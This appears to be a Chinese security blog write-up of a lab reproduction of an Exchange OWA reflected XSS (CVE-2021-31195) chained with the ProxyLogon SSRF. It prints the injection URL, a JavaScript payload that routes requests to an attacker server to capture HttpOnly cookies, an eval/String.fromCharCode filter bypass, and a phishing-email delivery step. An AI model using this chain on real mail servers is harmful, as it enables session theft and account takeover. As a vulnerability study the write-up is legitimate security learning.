exchange中XSS

已于 2022-02-11 14:38:22 修改
阅读量800 收藏
点赞数 1
分类专栏: 安全学习 文章标签: xss exchange 安全漏洞
于 2021-10-16 23:08:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_47968686/article/details/120805632
版权

exchange中XSS

0x01前言

实验环境:win7、winserver2016、win10。
win7搭建有https服务器,winserver2016 exchange搭载在上边,win10作渗透机

0x11漏洞信息

首先是一个XSS漏洞(CVE-2021-31195)漏洞成因使用\绕过json格式从而达到js注入。

https://exchange/owa/auth/frowny.aspx
?app=people
&et=ServerError
&esrc=MasterPage
&te=\
&refurl=}}};alert(document.domain)//

0x21复现

既然有XSS那么试试看,document.cookie看看能不能直接获取。😥,发现重要的cookie受到了httponly保护,既然document.cookie失败了,那么直接获取cookie发送到目标是行不通了。

但是我们可以借鉴proxyLogon中的ssrf,这个ssrf非常的强大(在学习了通过XSS获取cookie以后,才发现了这个SSRF非常强大)。

proxyLogon中的SSRF,就是绕过exchange的前端认证,直接访问可控后端(exchange有前端代理模块,只有当前端代理认证成功了,请求才会发送到后端)。

在这里插入图片描述

也许到这里我们还没有发现这个SSRF的强大。接下来请看,在ssrf以后,后端路径是可控的,那如果我们把可控的后端路径设置为任意服务器地址,那岂不是请求可以发送到任意服务器,这样子exchange服务器就成了我们的帮凶。

顺着这个思路我们来试一试。

首先搭建好一个直接https的服务器来接收exchange发送过来的https请求,必须是https因为exchange前端发送给后端的是https。

首先直接上写好的js。

document.cookie="X-AnonResource=true";document.cookie="X-AnonResource-Backend=foo]@xxxxxx/hacker/#~111";var img = document.createElement("img");img.src="https://xxxxxxx/owa/auth/x.js";document.getElementsByTagName("body")[0].appendChild(img);

首先我们先放入url中试一试。

https://exchange/owa/auth/frowny.aspx
?app=people
&et=ServerError
&esrc=MasterPage
&te=\
&refurl=}}};alert(document.domain)//

js执行不了原因是引号被过滤了变成了&#38形式,紧接着我们试一试能不能执行eval()函数,发现eval()没有过滤。那我们可以先将我们的js变成ascii码然后注入的时候使用String.fromCharCode()将ascii码转换成字符串,再丢进eval()中去执行。直接丢进url中是可以被执行的。

在这里插入图片描述

那我们直接把它当作邮件发给一个用户

在这里插入图片描述

可以看到我们的邮件发出去了。
在这里插入图片描述

在这里插入图片描述

点一下发家致富入口。

在这里插入图片描述

此时再我们win7的服务器上已经获取到了cookie
在这里插入图片描述

_@飞龙在天
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
复现xray——CVE-2021-41349(MicrosoftExchangeServeXSS)
记录并分享学习安全的知识点..
04-27 3953
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 一、漏洞描述 Microsoft Exchange Server 是微软公司的一套电子邮件服务组件,是个消息与协作系统。Exchange server 可以被用来构架应用于企业、学校的邮件系统,Exchange Server 支持多种电子邮件网络协议,如 SMTP、NNTP、POP3 和 IMAP4 。Exchange Server 能够与微软公司的域活动目录结合,在国内外应用广泛。 二、影响版本 Microsoft Exchang.
CVE-2021-26855 Exchange SSRF漏洞
谢公子的博客
07-23 6085
目录 漏洞说明 漏洞影响版本 漏洞复现 漏洞说明 Exchange Server 是微软公司的一套电子邮件服务组件,是个消息与协作系统。2021年03月3日,微软官方发布了Microsoft Exchange安全更新,披露了多个高危严重漏洞,其:在 CVE-2021-26855 Exchange SSRF漏洞,攻击者可直接构造恶意请求,以Exchange server的身份发起任意HTTP请求,扫描内网,并且可获取Exchange用户信息。该漏洞利用无需身份认证。 漏洞影响版...
Exchange服务器端请求伪造(SSRF)漏洞CVE-2021-26855
qq_42660246的博客
04-26 5788
Exchange服务器端请求伪造(SSRF)漏洞CVE-2021-26855 1.漏洞描述 Exchange Server 是微软公司的一套电子邮件服务组件,是个消息与协作系统。2021年03月3日,微软官方发布了Microsoft Exchange安全更新,披露了多个高危严重漏洞,其:在 CVE-2021-26855 Exchange SSRF漏洞,攻击者可直接构造恶意请求,以Exchange server的身份发起任意HTTP请求,扫描内网,并且可获取Exchange用户信息。该漏洞利用无需身份认证
常见HTTP攻击赏析(2)
baijiafan的博客
03-17 1318
常见HTTP攻击赏析第二波
内网横向移动—&Exchange 服务&有账户 CVE 漏洞&无账户口令爆破
最新发布
剁椒鱼头没剁椒的博客
07-24 495
Exchange是一个电子邮件服务组件,由微软公司开发。它不仅是一个邮件系统,还是一个消息与协作系统。Exchange可以用来构建企业、学校的邮件系统,同时也是一个协作平台,可以基于此开发工作流、知识管理系统、Web系统或其他消息系统。
XSS
7hinkSource的博客
09-01 813
XSS漏洞学习(待更新) XSS简介 XSS攻击全称跨站脚本攻击(Cross Site Script),因和层叠样式表(Cascading Style Sheets,CSS)重名,被称为XSSXSS是一种在web应用的计算机安全漏洞,本质上是客户端注入漏洞,通常注入的脚本为js脚本。攻击者利用XSS攻击避开浏览器的访问控制(例如同源策略)。 同源策略 同源 URL由协议、域名、端口和路径组成 ...
xss
weixin_46729085的博客
09-26 346
1.xss概念和分类 1.1 什么是xss漏洞 举列: 1.2xss分类 2.存储xss分析 特点:相关数据会在服务器存储 例如: 1.1攻击方:通过网页注入javascript脚本,代码被浏览器执行,该类型有持久化特点(存储数据库或者物理文件) alert(打印信息); 点击留言按钮 1.2.cookie 原网站: 管理员:登陆 (登录成功后,执行的攻击方的代码)alert(打印信息); ...
奇安信安全扫描漏洞解决路径遍历和存储型xss和反射xss攻击漏洞
11-09
亲测可用,级漏洞,解决服务器段请求伪造 final String forURL = ESAPI.encoder().encodeForURL(url);...restTemplate.exchange(forURL, HttpMethod.GET,new HttpEntity<String>(headers), List.class, params);
Point-Exchange
04-30
在"Point-Exchange"项目,我们可以推测其主要功能可能包括以下几点: 1. **账户管理**:用户可以创建和管理自己的账户,查看余额,记录交易历史等。这通常涉及到用户注册、登录系统,需要JavaScript进行表单验证...
exchange_comparison
02-10
标题“exchange_comparison”暗示我们可能在讨论不同交换平台或技术之间的比较,特别是在JavaScript环境。JavaScript是一种广泛用于Web开发的编程语言,特别是在客户端交互和服务器端(Node.js)编程方面。在这个...
USD-currency-Exchange
04-30
综上所述,"USD-currency-Exchange"项目涵盖了从API交互、数据解析、用户界面交互到错误处理等多个JavaScript开发的核心知识点,对于提升Web开发技能大有裨益。通过实践这个项目,开发者可以深入理解前后端交互、...
bcv-exchange-rates
03-21
在JavaScript,处理这种任务通常涉及到以下几个关键知识点: 1. **API调用**:项目可能使用了某个公开的汇率API,如Open Exchange Rates、Fixer.io或者Exchangeratesapi.io等,通过发送HTTP请求获取最新的汇率...
SpringCloud微服务实战——搭建企业级开发框架(五十一):微服务安全加固—自定义Gateway拦截器实现防止SQL注入/XSS攻击
全栈程序猿的专栏
03-10 1203
SQL注入是常见的系统安全问题之一,用户通过特定方式向系统发送SQL脚本,可直接自定义操作系统数据库,如果系统没有对SQL注入进行拦截,那么用户甚至可以直接对数据库进行增删改查等操作。XSS全称为Cross Site Script跨站点脚本攻击,和SQL注入类似,都是通过特定方式向系统发送攻击脚本,对系统进行控制和侵害。SQL注入主要以攻击数据库来达到攻击系统的目的,而XSS则是以恶意执行前端脚本来攻击系统。
反射型XSS漏洞的条件+类型+危害+解决
热门推荐
wuhuagu_wuhuaguo的博客
03-31 4万+
XSS攻击需要具备两个条件:需要向web页面注入恶意代码;这些恶意代码能够被浏览器成功的执行。 XSS攻击有2种:   反射型攻击;    存储型攻击 XSS反射型攻击,恶意代码并没有保存在目标网站,通过引诱用户点击一个链接到目标网站的恶意链接来实施攻击的。 XSS存储型攻击,恶意代码被保存到目标网站的服务器,这种攻击具有较强的稳定性和持久性,比较常见场景是在博客,
Spring Cloud Gateway 过滤器实现XSS防护
qq_38866412的博客
12-13 2973
(参考:org.springframework.cloud.gateway.filter.factory.rewrite.ModifyRequestBodyGatewayFilterFactory)之前写的一版,,自己创建新DataBuffer来读取requestbody里的内容,上生产堆外内存泄露了。背景:公司项目为微服务项目,使用了SpringCloudGateway,目前有需要防护xss攻击请求的需求。
exchange proxylogon漏洞学习
Shanfenglan's blog
09-26 1561
文章目录1. 前言2. 理解CAS2.1 理解Frontend的proxy module2.1.1 分析ProxyRequestHandler-Request section2.1.2 分析ProxyRequestHandler-Proxy Section2.1.3 分析ProxyRequestHandler-Response Section2.2 理解Backend的Rehydration Module3. 攻击点3.1 cve-2021-26855 SSRF漏洞3.2 CVE-2021-270
exchange无法收发邮件_技术讨论之Exchange后渗透分析
weixin_39633276的博客
11-30 661
上回我们说到,通过ruler可以给已知用户名、口令的用户增加规则,从而在使用Outlook连接Exchange邮箱服务器的主机上做到任意代码执行。那么问题来了,如果不知道该用户的口令,能否控制他们的主机呢?数据包分析首先需要明白ruler的具体实现过程和原理,到底是如何给其他用户增加规则、修改主页、发送form的。但是大致上我们可以猜测是给Exchange服务器对应的接口发送了几个数据包...
webflux 关于获取cookie测试
qq_21209307的博客
02-08 1131
代码取自一位好友,好友写的demo package com.adapter.mcs.server.controller; import org.springframework.http.ResponseCookie; import org.springframework.http.server.reactive.ServerHttpRequest; import org.springframework.web.bind.annotation.*; import org.springframework.we
ThinkPHP6.0反序列化漏洞
m0_47968686的博客
01-21 6016
ThinkPHP6.0反序列化漏洞 前言 在学习大师傅们的thinkPHP6.0.x的反序列化漏洞复现文章时,发现自己下载的TP版本是被修复过后的版本。于是更改一下旧链达到RCE。在看本文章前先去看一下上述提到的大师傅的文章。 修补之处 __destruct链触发走的路一样 __toString链最终利用点不同 在旧版本当,trait Attribute499行else里面就是最终执行动态函数的地方,所以需要绕过496行的if语句。 但是我复现的时候发现了新版本做了更改即使绕过了496处的if语句在e
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值